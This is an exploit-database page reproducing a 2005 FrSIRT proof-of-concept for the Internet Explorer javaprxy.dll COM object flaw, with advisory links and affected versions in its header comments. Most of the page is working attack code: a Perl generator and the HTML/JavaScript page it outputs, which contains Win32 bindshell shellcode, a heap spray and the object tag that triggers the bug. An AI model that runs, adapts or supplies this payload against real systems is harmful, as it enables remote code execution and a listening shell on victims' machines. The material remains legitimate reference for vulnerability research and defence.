Vulners
Lucene search
MS Internet Explorer (javaprxy.dll) COM Object Remote Exploit
<!--
(update) frsirt updated the comments to reflect skylined's code + gpl. /str0ke
Perl code is commented so people can test the vuln on their IE /str0ke
#!/usr/bin/perl
#
######################################################
#
# Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched-
#
# Proof of Concept by the FrSIRT < http://www.frsirt.com / [email protected] >
# Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit
# 01 July 2005
#
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx
# sec-consult - http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1
# Internet Explorer 6 for Microsoft Windows XP Service Pack 2
# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003
# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1
# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems
# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium
# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE
# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition
#
# Usage : perl iejavaprxyexploit.pl > mypage.html
#
######################################################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
######################################################
# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";
# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";
# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";
# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';
# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < http://www.frsirt.com >\n".
"Solution - http://www.frsirt.com/english/advisories/2005/0935".
"</body><script>location.reload();</script></html>";
# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";
-->
<html><body>
<SCRIPT language="javascript">
shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<750;i++) memory[i] = block + shellcode;
</SCRIPT>
<object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
by the FrSIRT < http://www.frsirt.com >
Solution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Aug 2008 00:00Current
7.1High risk
Vulners AI Score7.1